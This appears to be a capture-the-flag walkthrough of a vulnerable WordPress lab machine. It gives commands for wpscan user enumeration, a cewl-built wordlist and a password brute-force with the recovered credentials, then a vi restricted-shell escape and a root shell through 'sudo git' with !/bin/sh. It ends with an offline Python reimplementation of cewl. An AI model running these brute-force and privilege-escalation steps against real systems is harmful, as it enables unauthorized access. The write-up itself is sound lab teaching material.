1. Scanned the target and found only tcp/80 open.
2. Found a WordPress install.
3. Enumerated 3 usernames with wpscan. It was an old version, so that could have been exploited directly.
4. Found hints on the site recommending cewl to build a wordlist from the site's own content. Did so.
5. Ran a wpscan password attack against jerry with cewlwords.out and got a match: jerry / adipiscing.
cewl -d 2 -m 5 -w cewlwords.out http://target
wpscan --url http://192.168.100.194/index.php -P cewlwords.out -U jerry -t 50
(For cewl, -d 2 follows links two levels deep, -m 5 keeps only words of five or more characters, and -w writes the list. For wpscan, -t is the short form of --max-threads; older 2.x builds spelled it --threads.)
** Clues on the site said a regular wordlist wouldn't crack the login, but referenced 'cewl'.
6. Logged into WordPress.
7. SSH-ed in as tom with the password found from the cewl wordlist.
8. su-ed to jerry with his password.
9. Used a vi shell-escape trick to get root and found the flag.
- Open vi and enter :set shell=/bin/sh
- Then enter :shell
- That drops you into /bin/sh from the restricted login shell, but the restricted PATH is still in effect, so fix it:
- export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- GTFOBins lists a way to use git for privilege escalation when it can be run via sudo.
- Run sudo git -p help config and, when the pager stops scrolling, type !/bin/sh to get a root shell.
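The reason the site-specific wordlist worked where a generic one failed is that cewl harvests the words actually printed on the target's pages (here, "adipiscing" from lorem-ipsum filler). As an added example, not part of the original write-up or of cewl itself, the Python below reimplements that crawl: it starts at a URL, follows same-host links to a given depth, strips script/style content, and collects words of at least a minimum length, most frequent first, the same way cewl -d 2 -m 5 does. The site contents, URLs and the fetch callback are constructed stand-ins so it runs offline.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed stand-in for the target site (URL -> HTML). Real cewl fetches
# these over HTTP; inline pages let the example run offline. The lorem-ipsum
# filler on the front page is where the password "adipiscing" comes from.
SITE = {
    "http://target/": """<html><body>
        <h1>Tom and Jerry's Blog</h1>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</p>
        <a href="/about">About</a> <a href="/posts/1">First post</a>
        </body></html>""",
    "http://target/about": """<html><body>
        <p>A normal wordlist won't crack this login. Try cewl instead.</p>
        <a href="/contact">Contact</a> <a href="http://other.example/x">ext</a>
        </body></html>""",
    "http://target/posts/1": """<html><body>
        <p>Sed do eiusmod tempor incididunt ut labore.</p>
        <script>var hidden = "scriptword";</script>
        </body></html>""",
    "http://target/contact": """<html><body>
        <p>Reachable at depth two.</p><a href="/deep">deeper</a>
        </body></html>""",
    "http://target/deep": "<html><body><p>Beyond the depth limit.</p></body></html>",
}

WORD_RE = re.compile(r"[A-Za-z]+")


class _TextAndLinks(HTMLParser):
    """Collect visible text (skipping <script>/<style>) and href targets."""

    def __init__(self):
        super().__init__()
        self.text, self.links, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


def cewl_words(start_url, fetch, depth=2, min_len=5):
    """Breadth-first crawl from start_url, following only same-host links
    up to `depth` hops, returning words of >= min_len chars, most frequent
    first (ties alphabetical). `fetch(url)` returns HTML or None."""
    host = urlparse(start_url).netloc
    seen, queue, counts = set(), [(start_url, 0)], {}
    while queue:
        url, d = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        html = fetch(url)
        if html is None:
            continue
        page = _TextAndLinks()
        page.feed(html)
        for word in WORD_RE.findall(" ".join(page.text)):
            if len(word) >= min_len:
                counts[word] = counts.get(word, 0) + 1
        if d < depth:  # only enqueue children while inside the depth budget
            for href in page.links:
                full = urljoin(url, href)
                if urlparse(full).netloc == host:
                    queue.append((full, d + 1))
    return sorted(counts, key=lambda w: (-counts[w], w))


if __name__ == "__main__":
    # Equivalent of: cewl -d 2 -m 5 -w cewlwords.out http://target
    for w in cewl_words("http://target/", SITE.get, depth=2, min_len=5):
        print(w)
```

Words shorter than the minimum, text inside script tags, off-host links and pages beyond the depth limit are all excluded, which is also why tuning -d and -m matters on a real target: too shallow or too strict and the one word you need never makes it into the list.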

By Greg Miller

Ex-military cyber officer. Triathlete and mountain bike racer.